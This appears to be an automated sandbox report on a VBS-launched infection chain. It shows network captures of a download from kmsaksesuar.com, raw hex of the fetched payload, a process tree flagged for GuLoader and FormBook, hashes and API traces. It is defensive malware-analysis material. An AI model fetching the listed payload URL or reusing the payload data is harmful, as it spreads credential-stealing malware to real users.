Oct 30, 2024 07:34:12.618735075 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.618855000 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.643477917 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.643651962 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.735821962 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.736001968 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.760507107 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.760690928 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.853085041 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.853260040 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.878242970 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.878428936 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.970328093 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.970438004 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.994677067 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.994978905 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:12.995960951 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:12.996053934 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.112052917 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.112152100 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.112679958 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.112813950 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.204552889 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.204688072 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.229254961 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.229355097 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.276109934 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.276282072 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.346476078 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.346626043 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.346824884 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.346949100 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.438848972 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.438987970 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.463596106 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.463782072 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.464340925 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.464426041 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.556121111 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.556332111 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.581125021 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.581307888 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.622926950 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.623208046 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.673412085 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.673736095 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.698050976 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.698198080 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.740113020 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.740294933 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.790503979 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.790595055 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.815419912 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.815562010 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.857347012 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.857441902 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:13.907531023 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:13.907730103 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:14.131042004 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:14.131056070 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:14.131103992 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:14.131223917 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:14.131263971 CET	443	49976	46.28.239.165	192.168.2.5
Oct 30, 2024 07:34:14.131299973 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:14.131341934 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:14.132162094 CET	49976	443	192.168.2.5	46.28.239.165
Oct 30, 2024 07:34:14.132181883 CET	443	49976	46.28.239.165	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 07:34:10.611119032 CET	58081	53	192.168.2.5	1.1.1.1
Oct 30, 2024 07:34:10.756653070 CET	53	58081	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 30, 2024 07:34:10.611119032 CET	192.168.2.5	1.1.1.1	0x2c21	Standard query (0)	kmsaksesuar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 30, 2024 07:34:10.756653070 CET	1.1.1.1	192.168.2.5	0x2c21	No error (0)	kmsaksesuar.com		46.28.239.165	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

kmsaksesuar.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49976	46.28.239.165	443	5360	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 06:34:11 UTC	192	OUT	GET /CXvhXkzFIbqDQGDXBmPisHdik126.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: kmsaksesuar.com Cache-Control: no-cache
2024-10-30 06:34:12 UTC	223	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 06:34:11 GMT Server: Apache Last-Modified: Tue, 29 Oct 2024 20:41:17 GMT Accept-Ranges: bytes Content-Length: 287296 Connection: close Content-Type: application/octet-stream
2024-10-30 06:34:12 UTC	7969	IN	Data Raw: 7f 57 f2 72 a0 f6 59 ff 61 e5 91 d2 cc d4 ac 05 98 90 21 34 5b 88 13 f2 c3 e8 7e d1 6a 21 7b 87 06 92 26 11 9e b4 48 18 94 66 be cd 64 74 30 c1 ba 65 27 2e d8 bd fe bd 99 ea 02 1a d0 9b 7c fd 1d 6f 74 db 87 2b a4 f6 f1 c8 99 0a a0 fc c5 0d dc c6 ec a7 21 b2 9d ee 8c 21 83 7e f9 b4 d6 1c e5 a4 5d a7 62 29 f5 16 3f 05 06 04 b1 47 24 89 64 95 a2 d3 f9 8b 96 d9 9e f9 bd 01 bf e2 93 16 49 99 cc ed 7c a9 c5 cd a5 93 02 3f 72 7a 49 7e 30 ac 7d a7 38 d8 cc e4 10 2d 5e b1 8b 8f 84 f7 c7 ad 27 ba d5 a5 b0 41 57 43 8c 08 2c 4d 1e a6 5c bc d6 aa 2f 05 c0 8c a8 43 6c ef 7a 69 a5 f8 43 25 88 ba 50 85 c8 0d 78 32 e7 97 e1 d1 a4 f8 85 7a 7f d9 3b b8 31 aa 7a 9a 09 06 42 75 04 b0 a4 a0 7c 91 b4 9c b4 a8 ca ae e6 ed 8f 8b 16 45 a2 d1 80 0c 15 be 0b b0 13 89 79 30 39 47 03 Data Ascii: WrYa!4[~j!{&Hfdt0e'.\|ot+!!~]b)?G$dI\|?rzI~0}8-^'AWC,M\/ClziC%Px2z;1zBu\|Ey09G
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: a1 72 9e 15 00 02 8a c2 c4 d6 ac 88 18 1e 49 50 1e 89 43 ed b7 60 b7 f4 fd db f0 0a 85 0a 8d 5e 7c ff 70 3a 0a 07 99 43 21 cb d8 f8 67 7d ce 5c 3e 2d d2 9e 04 25 29 31 34 c4 43 71 a7 9f d8 7d 17 96 bc 9f 61 d0 e7 f1 6f 4f 27 43 3f 88 eb 4a c5 e1 bf f6 48 b9 9e 1d 96 f7 7b 7e 41 e4 16 e5 4e 67 ae d4 14 63 fd 97 59 1c 20 75 49 ba 88 54 d7 a3 19 89 7e ef 44 45 f9 91 2f b5 be 0c f5 19 ea 47 4d 1d de 43 53 1c a4 50 a3 42 15 5d 86 a1 20 24 a7 30 dd d9 cb 57 a5 b1 ff 7d 6d 9f 70 a0 c3 b8 98 67 2e c2 c3 a2 9b d9 ce 3f c9 43 71 40 87 bc 7a 35 de 19 86 43 ca 97 08 36 45 ad 9d 4a 55 27 47 0a 36 08 1c 88 d7 4d 25 c7 38 7a 7a d9 cf 68 b1 22 66 89 85 92 b6 d0 7e 52 2f 64 a1 31 cf bc c9 5b 92 8b 5a 82 e7 13 41 e0 23 53 f0 eb 41 0d 61 66 1b 75 0e d3 06 ac 8c cb 85 0e f1 Data Ascii: rIPC`^\|p:C!g}\>-%)14Cq}aoO'C?JH{~ANgcY uIT~DE/GMCSPB] $0W}mpg.?Cq@z5C6EJU'G6M%8zzh"f~R/d1[ZA#SAafu
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: a6 5a c4 47 d9 4b bd 49 87 d2 5a 46 44 54 25 ba 9b 89 4c 70 c7 50 30 8d 07 4a 10 c5 92 32 cf 82 91 f9 5a 2f 4c ec 7e 8a 08 2f 30 64 59 55 27 bb bb 8c 5c f1 b6 25 1f 50 db d2 c8 fd b2 b4 2f 5e 80 d3 1f 20 68 22 99 2e 7e 54 80 c6 88 cb 7a c1 d4 fe 7e 11 95 21 9c 86 b4 0b a1 72 f6 5a a0 05 cc 45 ae 45 2d 86 4f 49 7a ba af 55 fa 74 51 03 17 eb 08 aa f6 fc c5 06 2c d5 90 7d 93 a9 5c 9d c8 7e 37 20 aa fc 87 ad 6f 49 36 66 53 c9 75 2f b4 7c 4f dc 6e 9b d7 c9 b0 35 0e 72 84 da f0 65 d0 f3 5e 17 fe de ab 3b 50 90 94 07 75 87 8f 55 2a 67 11 0d 3f 11 44 fe 19 6b 29 6d 1a ea 8a c8 92 42 c9 6f e0 97 e5 4a eb 71 36 43 2a 8b 29 7f fc fc dd 08 b7 71 c5 02 a3 10 4b 71 74 ef 47 20 2e fd f8 53 79 42 8d 0b 92 67 70 ce 58 f4 17 b4 28 26 8e aa 3f 6d ae 4b f6 5e 9c 71 7d 30 e8 Data Ascii: ZGKIZFDT%LpP0J2Z/L~/0dYU'\%P/^ h".~Tz~!rZEE-OIzUtQ,}\~7 oI6fSu/\|On5re^;PuUg?Dk)mBoJq6C)qKqtG .SyBgpX(&?mK^q}0
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: 58 cc ca 85 81 0f b7 01 67 35 7c ba 89 9f 08 9c 4e be 92 33 72 6d 9c 85 46 84 07 58 75 77 07 20 77 79 2e 04 1e 2c 9c d6 b4 45 96 67 04 40 ba bb 88 68 10 d0 a5 44 4d 84 47 8e 73 95 6d e9 46 a5 84 23 8c a9 43 f0 bb 05 23 12 55 63 f2 02 76 23 19 f3 32 13 aa 3e 89 46 a7 fe 3d f2 c7 b6 8d b1 15 d5 f6 e9 87 f5 c8 79 a8 70 5c 3c d2 c3 80 bd d6 4f 27 7d 27 b3 88 4b 46 b8 7c f1 a0 7d 6e 63 e0 d3 c9 b2 58 93 1d e3 0a d8 f9 3c b9 db 4f d7 dd 5a 1e 70 39 bc fd 57 a4 55 ee f0 98 94 dc fd 34 2e 05 3e 1d 62 a6 20 32 37 d5 55 3a 50 10 57 96 71 97 d0 66 07 c3 75 ed 2b d7 e6 98 b8 8a 91 13 af d5 0f d6 f7 fa da 15 16 32 4b 86 bc cd bc da 3a 7f 7e 63 73 bc 16 f4 7e df d4 55 d7 e8 44 f4 dd 86 18 cf ef 15 37 1d 0e 43 38 6f c8 16 9b e1 05 ce 05 71 fb 3d 51 ae 60 ca a6 f5 ef aa Data Ascii: Xg5\|N3rmFXuw wy.,Eg@hDMGsmF#C#Ucv#2>F=yp\<O'}'KF\|}ncX<OZp9WU4.>b 27U:PWqfu+2K:~cs~UD7C8oq=Q`
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: a8 ec 0b 9a 0b 76 50 19 32 16 b0 69 d0 44 7d fa 43 50 2c a2 1d e2 9e 8c d3 9e cf e1 ba bc 74 06 9a 1d 94 11 58 83 b3 b3 89 ee 97 ba 63 cf a2 3d c7 ce 36 c2 06 51 91 6d 52 33 3a 55 71 d9 1b 7f 89 e7 e5 d6 c2 47 0f 8b be 53 9d b5 7a 64 32 ad 91 7f 2f 2c 33 00 2f 4e f9 78 a4 b9 84 20 dc 5c 1a 44 79 5a bf 4d c5 53 cf 55 63 d2 2b d3 a1 b3 2e 11 04 62 c8 78 5e c2 1c 61 9d 08 53 89 5e 55 bb ab ef 37 81 d3 ee 1a 8d 6f e2 10 e8 84 2f ae 0f c5 35 50 9f fa aa 11 b1 b8 e8 fa e5 d7 5c 82 92 79 16 35 5f dc c3 d1 37 dd 59 91 f3 99 22 3a 51 b9 cf fc d7 4c ba a6 74 4e 6d d9 71 99 92 08 e3 87 8d bb c2 7a 83 06 9b ac 0c 6c 6d 65 69 a1 10 d8 cd bb 56 51 ff 6b be b0 f3 d1 a0 77 0d 55 40 b2 96 f0 02 84 be 42 2f c7 13 10 09 19 ee df a1 10 9f ed 7d ca f9 47 2a c9 74 22 2f 60 05 Data Ascii: vP2iD}CP,tXc=6QmR3:UqGSzd2/,3/Nx \DyZMSUc+.bx^aS^U7o/5P\y5_7Y":QLtNmqzlmeiVQkwU@B/}G*t"/`
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: 28 19 f7 d8 5e cc 72 d3 8f 93 31 3d 21 92 1e 80 f4 19 48 4d 47 16 ef 47 5c 42 23 4a 19 2f e6 7b 87 c4 0c 3b 13 03 ea 57 09 da 06 45 e8 da f4 db 0f a0 19 07 4e a5 2d 9b 8f 88 c3 50 bd 20 46 60 51 eb d4 1f c3 7e 12 65 48 77 a8 41 9d 9e ea 7e fd 02 ad 35 ac d1 25 76 f6 68 65 c6 15 9c c0 0d f5 ac 1a e1 e7 16 7a 9a 37 8f 49 5c 0d dd a2 37 8a 41 c7 bb 4f 05 1a f2 79 52 4c e8 6a 0a bd 48 b0 12 fc a1 40 85 7c aa a1 96 17 57 b7 e9 43 a6 cb 36 0b ba 74 dd d3 ca e3 ef ab 66 e8 31 f4 07 26 07 20 1b 6d 9c b9 f5 50 5f 18 5d 91 6f de 34 bd 4c fc 67 ab 4b 2a 4a 21 d9 d8 84 08 03 fd 9c 1e a1 21 d2 b5 2a 76 e5 29 85 74 04 84 44 53 d2 16 10 10 d9 c5 27 83 14 31 35 df 70 80 cb 6e b2 60 73 e9 37 13 aa ba 6c bf 9c 00 cc f1 1f 5d 0d 69 98 a9 31 4c c8 e8 75 49 81 de 4f 3e 9e 9a Data Ascii: (^r1=!HMGG\B#J/{;WEN-P F`Q~eHwA~5%vhez7I\7AOyRLjH@\|WC6tf1& mP_]o4LgKJ!!v)tDS'15pn`s7l]i1LuIO>
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: d3 16 2c 9a b7 2b 71 b4 07 3f 20 99 c0 6e 5c f5 73 c8 4b 80 eb 65 64 3a 08 12 8a 13 6f 7c 11 e5 61 8f 68 bc 4b ac 25 33 3c 2a 04 a8 ef 28 2f a8 85 3a f6 d6 53 0d db e5 d4 6a 60 9d bd 63 24 af 1e 46 23 6f e8 c1 1f 38 30 d4 fd f9 c9 a1 ad 29 40 f3 38 61 47 c3 8e 0b a3 fd 47 cf 31 d7 e8 6a d9 9f 51 60 97 ab 40 d4 44 41 45 c2 69 0c 5a 52 86 7b 67 86 9c d5 8f 02 1a 77 eb a5 5e 17 cc c2 9e 8c 0a d4 90 75 80 ec bd 97 ff 53 5e d8 df dd f2 63 d0 97 45 48 7d 81 cc d1 92 29 6c 94 bc 7b ea 9d 5e 57 ce 9c e4 da 2a 5a 64 1f 6b 8b 88 82 2f b8 2d c5 a4 e8 8b c2 66 a0 59 48 d8 8a f1 d1 f9 9d 9c d9 6d eb c0 2f d5 2d 97 a6 98 0a 4f 75 ec 75 98 75 5b a7 f9 a9 59 17 2d 53 27 a0 ef f9 63 5d ff 58 de 8c 96 4a b3 0d 8d 98 68 3b 92 41 1a 9b 7a b3 ef 8d ad 18 ae 36 78 3a a1 78 02 Data Ascii: ,+q? n\sKed:o\|ahK%3<(/:Sj`c$F#o80)@8aGG1jQ`@DAEiZR{gw^uS^cEH})l{^WZdk/-fYHm/-Ouuu[Y-S'c]XJh;Az6x:x
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: 8a 11 b1 81 6a 68 86 1b 85 b5 c0 04 0f 91 10 cc a0 92 a9 d1 5a fe ed 08 bd d5 0c ac d5 32 20 4c 20 a2 ff e6 f9 a7 cc e2 62 6c b4 7c 19 a4 f8 72 ce 30 61 53 cc 17 c2 5e d7 2b af 62 88 0c 86 72 86 17 80 95 a2 7f 79 b8 52 e8 fe e3 13 ee f3 4a ce 1c 33 32 a6 be 7a 03 68 23 d2 39 22 d4 c4 b9 a0 b5 07 fa 64 76 d3 56 69 62 e1 18 f2 7a 2c 20 2d 35 1b 03 44 ef be 5d 66 ff d4 d3 43 ca 94 8b 64 14 47 3f 07 43 6e 70 ca 32 da 25 90 08 e9 ea a0 5c 15 fa d3 3a 84 89 c8 41 47 9c be 0f 34 fd 2f 86 93 94 b9 09 36 8c d2 d3 1f 52 8c 47 55 48 7e a3 72 e6 29 4c 20 49 bd 47 d8 86 02 f7 bf 40 ba 8d d0 18 8b e7 53 e4 3a 6a 86 8b 90 8f 61 e8 5f 69 be 3f 29 07 a6 6d 79 2b 8b da cb 28 f4 50 e1 01 f2 15 83 9b d7 cb 16 0d b8 48 a9 62 bb 72 33 13 22 cc e7 44 48 e8 ae c9 4a 8d d2 7e 7a Data Ascii: jhZ2 L bl\|r0aS^+bryRJ32zh#9"dvVibz, -5D]fCdG?Cnp2%\:AG4/6RGUH~r)L IG@S:ja_i?)my+(PHbr3"DHJ~z
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: e5 33 15 bf 7e 31 1c 1c 98 b1 d6 fa 68 01 a3 fa 9c 35 fa 75 49 4f 49 d2 44 bb fa ba 88 a0 29 69 15 1b d4 45 ce 74 38 3d ea ad 57 b2 90 b9 39 f3 5d 3d 49 34 cd d2 da 38 95 cf 03 98 e4 c3 67 a6 d5 65 ee 5c 91 79 bb b3 9e 9a 06 f1 47 1a f1 aa ac 84 3e 11 a4 fc b3 46 8f e8 82 82 c8 d9 f6 31 fd 90 1e 1a 91 e9 6b 66 00 f8 ad c6 7f 17 bf 23 cd 4f 31 20 a8 af be 64 8e c4 a8 17 ae 31 10 a0 ae e0 7d 7d 3f 32 b4 0c 37 4f ac 62 02 92 e8 72 a3 32 d4 5e 8a 9a d0 56 0f ef f8 82 70 a3 52 17 21 69 9b a8 9f 67 6a 51 e1 86 18 7a 1b a1 df d6 0a 91 3a 60 b8 9b cf 7a 8a 78 87 d9 8b 41 30 dc 3a b2 28 ff c3 38 16 ee d6 8a be 0b d5 8c 43 cc 14 14 f6 26 35 fa 9c 40 7c 64 be af f6 0e 36 21 40 5e 81 73 bb cc 2d 74 a9 2b 03 d0 ef 6c 03 5f e7 e6 ba 56 e2 50 08 79 6c 8d 61 06 1d 7d c1 Data Ascii: 3~1h5uIOID)iEt8=W9]=I48ge\yG>F1kf#O1 d1}}?27Obr2^VpR!igjQz:`zxA0:(8C&5@\|d6!@^s-t+l_VPyla}
2024-10-30 06:34:12 UTC	8000	IN	Data Raw: 36 31 54 5f 8d 4e c5 a1 4e 8f 56 0c 94 05 e5 0a 58 bb 14 22 8a 1d 68 67 6a de 22 c0 a3 d7 c8 9d 0c c0 ff 57 c5 11 47 58 24 a1 d2 08 ee 3f 45 2d d9 f6 1f a3 fa d1 a6 42 26 4f 29 6c 41 4b 38 f7 e0 a8 ca 5d 0d 50 63 8e 42 b8 bd 6a 7a fe c5 26 a7 85 d2 4c 42 b2 9b 23 0c 7b e8 a5 cb 53 0d a7 22 42 63 e5 f1 96 b7 55 b9 50 ec 59 70 ea f6 6f 27 d3 90 6e f2 41 5d 54 9f f9 d6 60 45 97 28 34 85 66 df 35 00 79 60 59 72 b4 38 9c 63 a9 63 0f e9 4f 35 d7 e5 1a 0e 07 a9 ff 7e 97 ca 1f 54 07 d6 09 a6 aa 63 16 46 aa af 88 75 1d 03 5e 05 f6 96 cd 60 c2 74 bd e6 0e 57 b1 fe c1 be 71 a1 7d ca e3 f2 f5 fc 9d 3c b7 35 49 b3 19 ae 0c 6e 9f a6 a3 06 78 a2 c2 70 15 8a 13 ee 45 6a 1a 26 bb 2a 89 e2 85 9a 7d 0d 55 e1 a9 14 69 b5 69 27 29 ce 5f 52 9e 47 c8 a4 82 01 a4 ac 44 99 df f0 Data Ascii: 61T_NNVX"hgj"WGX$?E-B&O)lAK8]PcBjz&LB#{S"BcUPYpo'nA]T`E(4f5y`Yr8ccO5~TcFu^`tWq}<5InxpEj&*}Uii')_RGD

Target ID:	0
Start time:	02:32:45
Start date:	30/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_20241030.vbs"
Imagebase:	0x7ff683b50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:32:57
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
Imagebase:	0x400000
File size:	768'106 bytes
MD5 hash:	BC4F5F5E028CFD0EFEC5D07EF47C15D7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2739235138.00000000038CF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:33:54
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe"
Imagebase:	0x400000
File size:	768'106 bytes
MD5 hash:	BC4F5F5E028CFD0EFEC5D07EF47C15D7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3335643246.00000000351A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3336400994.0000000037600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:34:43
Start date:	30/10/2024
Path:	C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe"
Imagebase:	0x6a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3342290692.0000000004640000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:34:45
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\verclsid.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\verclsid.exe"
Imagebase:	0x8d0000
File size:	11'776 bytes
MD5 hash:	190A347DF06F8486F193ADA0E90B49C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3341143444.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3341888509.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3341485549.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	25.5%
Dynamic/Decrypted Code Coverage:	30%
Signature Coverage:	18.4%
Total number of Nodes:	701
Total number of Limit Nodes:	21

Executed Functions

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403373
GetVersion.KERNEL32 ref: 00403379
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
OleInitialize.OLE32(00000000), ref: 004033F0
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403434
CharNextW.USER32(00000000,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000020,?,00000006,00000008,0000000A), ref: 0040345B

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B2
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CE
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
ExitProcess.KERNEL32 ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036FA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403709
